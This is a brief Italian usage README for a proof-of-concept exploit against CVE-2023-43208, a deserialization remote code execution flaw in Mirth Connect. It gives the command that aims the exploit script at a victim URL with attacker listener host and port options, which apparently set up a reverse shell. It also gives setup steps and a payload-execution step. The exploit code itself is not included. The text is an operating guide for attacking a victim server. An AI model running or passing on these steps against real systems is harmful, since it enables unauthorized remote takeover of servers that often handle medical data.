
Sfrutta una vulnerabilità
Questo script è una Prova di Concetto (PoC) per la vulnerabilità di Esecuzione Remota di Codice (RCE) in Mirth Connect (versioni precedenti alla 4.4.1). Sfrutta una vulnerabilità di deserializzazione di XStream tramite l'API.
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
Si consiglia l'uso di un ambiente virtuale:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Esecuzione del payload
python3 payload.py